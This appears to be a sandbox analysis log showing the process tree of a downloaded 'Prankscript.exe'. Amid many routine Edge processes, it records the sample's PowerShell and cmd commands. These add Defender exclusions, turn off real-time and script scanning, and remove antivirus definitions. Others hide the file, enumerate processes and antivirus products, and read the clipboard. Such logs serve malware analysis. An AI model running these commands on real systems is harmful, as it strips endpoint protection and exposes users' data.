  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5440 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
  2⤵
  PID:3692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
  2⤵
  PID:4524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
  2⤵
  PID:752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
  2⤵
  PID:2820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1
  2⤵
  PID:724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
  2⤵
  PID:2924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3576 /prefetch:8
  2⤵
  PID:2612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
  2⤵
  PID:3816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:1
  2⤵
  PID:4336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5976 /prefetch:8
  2⤵
  PID:752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5708 /prefetch:8
  2⤵
  PID:5100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4788 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2036
- C:\Users\Admin\Downloads\Prankscript.exe
  "C:\Users\Admin\Downloads\Prankscript.exe"
  2⤵
  - Executes dropped EXE
  PID:2980
- - C:\Users\Admin\Downloads\Prankscript.exe
    "C:\Users\Admin\Downloads\Prankscript.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Prankscript.exe'"
      4⤵
      PID:5528
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Prankscript.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:5560
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
      4⤵
      PID:5572
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "start bound.exe"
      4⤵
      PID:5580
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6056
      - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\267E.tmp\267F.tmp\2680.vbs //Nologo
        6⤵
        Checks computer location settings
        
        PID:5336
        
        C:\Windows\System32\notepad.exe
        
        "C:\Windows\System32\notepad.exe"
        7⤵
        
        PID:976
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=IQDWOHB_kpI
        7⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of SendNotifyMessage
        
        PID:2848
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd489846f8,0x7ffd48984708,0x7ffd48984718
        8⤵
        
        PID:3620
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2292,9726136473578457973,5123243460197836141,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2308 /prefetch:2
        8⤵
        
        PID:6640
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2292,9726136473578457973,5123243460197836141,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6988
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2292,9726136473578457973,5123243460197836141,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8
        8⤵
        
        PID:6956
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2292,9726136473578457973,5123243460197836141,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
        8⤵
        
        PID:6556
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2292,9726136473578457973,5123243460197836141,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
        8⤵
        
        PID:5920
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2292,9726136473578457973,5123243460197836141,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
        8⤵
        
        PID:6204
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2292,9726136473578457973,5123243460197836141,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4408 /prefetch:1
        8⤵
        
        PID:5456
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2292,9726136473578457973,5123243460197836141,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5356 /prefetch:8
        8⤵
        
        PID:6276
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2292,9726136473578457973,5123243460197836141,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
        8⤵
        
        PID:6120
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2292,9726136473578457973,5123243460197836141,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6392 /prefetch:8
        8⤵
        
        PID:7024
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2292,9726136473578457973,5123243460197836141,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6392 /prefetch:8
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6964
        
        C:\Windows\System32\notepad.exe
        
        "C:\Windows\System32\notepad.exe"
        7⤵
        
        PID:1052
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/9xkQWvzcbk
        7⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:5000
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd489846f8,0x7ffd48984708,0x7ffd48984718
        8⤵
        
        PID:2168
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
        8⤵
        
        PID:6552
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:7068
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
        8⤵
        
        PID:5280
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
        8⤵
        
        PID:6136
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
        8⤵
        
        PID:3688
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
        8⤵
        
        PID:5744
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4460 /prefetch:8
        8⤵
        
        PID:6832
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5356 /prefetch:8
        8⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:6800
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 /prefetch:8
        8⤵
        
        PID:4896
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 /prefetch:8
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4900
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
        8⤵
        
        PID:5788
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
        8⤵
        
        PID:6584
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
        8⤵
        
        PID:6448
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
        8⤵
        
        PID:6456
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4296 /prefetch:1
        8⤵
        
        PID:2868
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
        8⤵
        
        PID:2156
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
        8⤵
        
        PID:3260
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
        8⤵
        
        PID:4984
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
        8⤵
        
        PID:5448
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6332 /prefetch:1
        8⤵
        
        PID:6744
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
        8⤵
        
        PID:2376
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,11518682555846880987,197709465307765619,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1908 /prefetch:2
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/m0c5o
        7⤵
        
        PID:4892
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd489846f8,0x7ffd48984708,0x7ffd48984718
        8⤵
        
        PID:1280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\Prankscript.exe""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:5588
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\Downloads\Prankscript.exe"
        5⤵
        Views/modifies file attributes
        
        PID:6064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5808
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5824
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6048
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:6120
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:5208
